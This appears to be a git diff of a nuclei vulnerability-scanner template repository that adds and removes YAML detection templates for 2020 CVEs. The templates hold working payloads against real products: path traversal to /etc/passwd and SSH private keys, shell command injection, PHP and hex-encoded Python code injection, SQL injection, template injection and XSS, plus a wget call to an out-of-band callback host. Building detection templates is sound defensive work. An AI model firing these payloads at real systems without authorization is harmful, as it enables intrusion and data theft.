Cacti=%3Bwget%20http%3A//{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-8982.yaml b/nuclei-templates/CVE-2020/CVE-2020-8982.yaml deleted file mode 100644 index b7a74ddd43..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8982.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-8982 - -info: - name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read - author: dwisiswant0 - severity: high - description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. - reference: - - https://support.citrix.com/article/CTX269106 - - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view - - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-8982 - cwe-id: CWE-22 - tags: cve,cve2020,citrix,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-9036.yaml b/nuclei-templates/CVE-2020/CVE-2020-9036.yaml index 813e7d55ea..e19606cf3b 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-9036.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-9036.yaml @@ -4,16 +4,16 @@ info: name: Jeedom through 4.0.38 allows XSS author: pikpikcu severity: medium - description: Jeedom through 4.0.38 allows XSS. reference: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 + tags: cve,cve2020,xss,jeedom classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-9036 cwe-id: CWE-79 - tags: cve,cve2020,xss,jeedom + description: "Jeedom through 4.0.38 allows XSS." requests: - method: GET diff --git a/nuclei-templates/CVE-2020/CVE-2020-9043.yaml b/nuclei-templates/CVE-2020/CVE-2020-9043.yaml new file mode 100644 index 0000000000..a69d7a2a55 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-9043.yaml @@ -0,0 +1,64 @@ +id: CVE-2020-9043 +info: + name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation + author: scent2d + severity: high + description: | + The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. + reference: + - https://wpscan.com/vulnerability/10074 + - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 + - https://wordpress.org/plugins/wp-central/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-9043 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 + Host: {{Hostname}} + redirects: true + max-redirects: 2 + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(all_headers_4, 'text/html')" + - "status_code_4 == 200" + - "contains(body_4, 'wpCentral Connection Key')" + - contains(body_4, "pagenow = \'dashboard\'") + condition: and + extractors: + - type: regex + name: authkey + part: body + group: 1 + regex: + - 'style="word-wrap:break-word;">([a-z0-9]+)' + internal: true + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true diff --git a/nuclei-templates/CVE-2020/CVE-2020-9054.yaml b/nuclei-templates/CVE-2020/CVE-2020-9054.yaml deleted file mode 100644 index dfaeba128c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-9054.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-9054 - -info: - name: Zyxel NAS Firmware 5.21- Remote Code Execution - author: dhiyaneshDk - severity: critical - description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.' - reference: - - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml - - https://nvd.nist.gov/vuln/detail/CVE-2020-9054 - - https://kb.cert.org/vuls/id/498544/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-9054 - cwe-id: CWE-78 - tags: cve,cve2020,rce,zyxel,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/cve-2020-9376.yaml b/nuclei-templates/CVE-2020/CVE-2020-9376.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9376.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9376.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9402.yaml b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml index 4c186f08ef..172130f2c4 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-9402.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml @@ -2,21 +2,19 @@ id: CVE-2020-9402 info: name: Django SQL Injection - author: geeknik - severity: high - description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. reference: - - https://www.debian.org/security/2020/dsa-4705 - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 - remediation: Upgrade to the latest version. + author: geeknik + severity: high + tags: cve,cve2020,django,sqli classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-9402 cwe-id: CWE-89 - tags: cve,cve2020,django,sqli requests: - method: GET @@ -31,5 +29,3 @@ requests: - "ORA-06512:" - "Request Method:" condition: and - -# Enhanced by mp on 2022/02/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-9483.yaml b/nuclei-templates/CVE-2020/CVE-2020-9483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9483.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9483.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9484.yaml b/nuclei-templates/CVE-2020/CVE-2020-9484.yaml deleted file mode 100644 index 90bc77d900..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-9484.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2020-9484 - -info: - name: Apache Tomcat Remote Command Execution - author: dwisiswant0 - severity: high - description: | - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if - a) an attacker is able to control the contents and name of a file on the server; and - b) the server is configured to use the PersistenceManager with a FileStore; and - c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and - d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. - Note that all of conditions a) to d) must be true for the attack to succeed. - reference: - - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-9484 - - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E - - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7 - cve-id: CVE-2020-9484 - cwe-id: CWE-502 - tags: cve,cve2020,apache,tomcat,rce - -requests: - - method: GET - headers: - Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy" - path: - - "{{BaseURL}}/index.jsp" - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - part: body - words: - - "Exception" - - "ObjectInputStream" - - "PersistentManagerBase" - condition: and - -# Enhanced by mp on 2022/04/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-9496.yaml b/nuclei-templates/CVE-2020/CVE-2020-9496.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9496.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9496.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9757.yaml b/nuclei-templates/CVE-2020/CVE-2020-9757.yaml new file mode 100644 index 0000000000..8595f0a619 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-9757.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-9757 + +info: + name: Craft CMS < 3.3.0 - Server-Side Template Injection + author: dwisiswant0 + severity: critical + description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller. + reference: + - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md + - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt + - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b + - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f + - https://nvd.nist.gov/vuln/detail/CVE-2020-9757 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-9757 + cwe-id: CWE-74 + tags: cve,cve2020,ssti + +requests: + - method: GET + path: + - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" + - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" + + skip-variables-check: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "MetaLinkContainer" + - "canonical" + - "22344" + condition: and + part: body + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2020/cve-2020-10124.yaml b/nuclei-templates/CVE-2020/cve-2020-10124.yaml deleted file mode 100644 index a8142579c3..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-10124.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-10124 - -info: - name: SolarWindsOrion LFI - author: medbsq - severity: medium -#- https://www.cvebase.com/cve/2019/11043 - -requests: - - method: GET - path: - - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" - - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "SolarWinds.Orion.Core.Common." - - "Connection String" - condition: or - part: body - - type: word - words: - - "text/plain" - - "SolarWindsOrionDatabaseUser" - condition: or - part: header - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-10549.yaml b/nuclei-templates/CVE-2020/cve-2020-10549.yaml new file mode 100644 index 0000000000..9a05c1f547 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10549.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-10549 +info: + name: rConfig 3.9.4 SQLi + author: madrobot + severity: critical + description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + reference: + - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10549 + cwe-id: CWE-89,CWE-522 + +requests: + - method: GET + path: + - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[project-discovery]" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-11110.yaml b/nuclei-templates/CVE-2020/cve-2020-11110.yaml deleted file mode 100644 index da0bf70b6c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-11110.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-11110 - -info: - author: emadshanab - severity: medium - name: Grafana Unauthenticated Stored XSS - description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. - tags: cve,cve2020,xss,grafana - reference: - - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-11110 - cwe-id: CWE-79 -requests: - - raw: - - | - POST /api/snapshots HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Referer: {{BaseURL}} - content-type: application/json - Connection: close - - {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - application/json - - - type: word - part: body - words: - - '"deleteKey":' - - '"deleteUrl":' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"url":"([a-z:/0-9A-Z]+)"' diff --git a/nuclei-templates/CVE-2020/cve-2020-11455.yaml b/nuclei-templates/CVE-2020/cve-2020-11455.yaml new file mode 100644 index 0000000000..99abf2cac1 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11455.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-11455 + +info: + name: LimeSurvey 4.1.11 - Path Traversal + author: daffainfo + severity: medium + description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + reference: + - https://www.exploit-db.com/exploits/48297 + - https://www.cvedetails.com/cve/CVE-2020-11455 + tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-11455 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-11546.yaml b/nuclei-templates/CVE-2020/cve-2020-11546.yaml new file mode 100644 index 0000000000..52cdfcbe5f --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11546.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-11546 + +info: + author: Official_BlackHat13 + severity: critical + name: SuperWebmailer Remote Code Execution + description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection. + tags: cve,cve2020,rce,superwebmailer + reference: + - https://github.com/Official-BlackHat13/CVE-2020-11546/ + - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-11546 + metadata: + shodan-query: title:"SuperWebMailer" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-11546 + cwe-id: CWE-94 + +requests: + - raw: + - | + POST /mailingupgrade.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - ajax_ccea.php + - ajax_getemailingactions.php + - ajax_getemailtemplates.php + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-11854.yaml b/nuclei-templates/CVE-2020/cve-2020-11854.yaml deleted file mode 100644 index 710aa30a11..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-11854.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-11854 - -info: - name: Micro Focus UCMDB RCE - author: dwisiswant0 - severity: critical - reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html - description: | - This template supports the detection part only. - - UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, - but this template can probably also be used to detect Operations Bridge Manager - (containeirized) and Application Performance Management. - - Originated from Metasploit module (#14654). - tags: cve,cve2020,ucmdb,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-11854 - cwe-id: CWE-798 - -requests: - - method: GET - path: - - "{{BaseURL}}/ucmdb-api/connect" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "HttpUcmdbServiceProviderFactoryImpl" - - "ServerVersion=11.6.0" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-11930.yaml b/nuclei-templates/CVE-2020/cve-2020-11930.yaml new file mode 100644 index 0000000000..543e1d0764 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11930.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-11930 + +info: + name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS + author: dhiyaneshDK + severity: medium + description: | + The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. + reference: + - https://wpscan.com/vulnerability/10181 + - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module + tags: cve,cve2020,wordpress,xss,plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11930 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3Ealert("XSS")' + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-11991.yaml b/nuclei-templates/CVE-2020/cve-2020-11991.yaml new file mode 100644 index 0000000000..18b959d535 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-11991.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-11991 + +info: + name: Apache Cocoon 2.1.12 XML Injection + author: pikpikcu + severity: high + tags: cve,cve2020,apache,xml,cocoon + description: | + When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. + reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11991 + cwe-id: CWE-611 + +requests: + - method: POST + path: + - "{{BaseURL}}/v2/api/product/manger/getInfo" + headers: + Content-Type: "text/xml" + body: | + + ]> + + John + &ent; + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-12116.yaml b/nuclei-templates/CVE-2020/cve-2020-12116.yaml new file mode 100644 index 0000000000..27fceb2fac --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12116.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-12116 + +info: + name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read + author: dwisiswant0 + severity: high + description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. + tags: cve,cve2020,zoho,lfi,manageengine + reference: https://github.com/BeetleChunks/CVE-2020-12116 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-12116 + cwe-id: CWE-22 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + - | + GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Cache-Control: max-age=0 + Connection: close + Referer: http://{{Hostname}} + + extractors: + - type: regex + name: endpoint + part: body + internal: true + regex: + - "(?m)/cachestart/.*/jquery/" + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' + - 'status_code_2 == 200' + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-12447.yaml b/nuclei-templates/CVE-2020/cve-2020-12447.yaml new file mode 100644 index 0000000000..941f7e0b40 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12447.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-12447 + +info: + name: Onkyo TX-NR585 Web Interface - Directory Traversal + author: 0x_Akoko + severity: high + description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + impact: | + An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. + remediation: | + Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. + reference: + - https://blog.spookysec.net/onkyo-lfi + - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 + - https://blog.spookysec.net/onkyo-lfi/ + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-12447 + cwe-id: CWE-22 + epss-score: 0.01711 + epss-percentile: 0.8752 + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: onkyo + product: tx-nr585_firmware + tags: cve,cve2020,onkyo,lfi,traversal + +http: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13167.yaml b/nuclei-templates/CVE-2020/cve-2020-13167.yaml deleted file mode 100644 index 3bc65d24ca..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-13167.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-13167 - -info: - name: Netsweeper WebAdmin unixlogin.php Python Code Injection - author: dwisiswant0 - severity: critical - description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. - tags: cve,cve2020,netsweeper,rce,python,webadmin - reference: - - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-13167 - cwe-id: CWE-78 - metadata: - hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' - -requests: - - method: GET - path: - - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - - "{{BaseURL}}/webadmin/out" - - headers: - Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" - - matchers-condition: and - matchers: - - type: word - words: - - "nonexistent" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-13405.yaml b/nuclei-templates/CVE-2020/cve-2020-13405.yaml new file mode 100644 index 0000000000..cd153be8e7 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13405.yaml @@ -0,0 +1,57 @@ +id: CVE-2020-13405 + +info: + name: Microweber <1.1.20 - Information Disclosure + author: ritikchaddha,amit-jd + severity: high + description: | + Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability. + reference: + - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ + - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 